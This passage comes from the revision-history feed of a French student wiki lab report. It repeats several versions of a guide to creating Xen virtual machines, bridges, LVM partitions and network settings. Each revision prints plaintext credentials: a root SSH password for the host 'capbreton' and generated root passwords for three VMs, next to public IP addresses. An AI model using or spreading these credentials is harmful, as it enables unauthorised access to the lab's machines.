''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11398
Atelier SysRes SE4 2025/2026 E5
2026-01-26T10:09:30Z
<p>Cpayet : /* Configuration réseau */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
==== Configuration réseau ====<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
<br />
Depuis <code>/etc/resolv.conf :</code><syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11394
Atelier SysRes SE4 2025/2026 E5
2026-01-26T09:53:57Z
<p>Cpayet : /* Configuration réseau */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
==== Configuration réseau ====<br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11391
Atelier SysRes SE4 2025/2026 E5
2026-01-26T09:51:01Z
<p>Cpayet : /* XEN */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.3/24<br />
gateway 172.60.0.1<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IP de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 172.60.0.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.161<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
==== Configuration réseau ====<br />
<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED']<br />
</syntaxhighlight>Pour l'adresse maxc on prend celui existant et on fait +1.<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11390
Atelier SysRes SE4 2025/2026 E5
2026-01-26T09:47:46Z
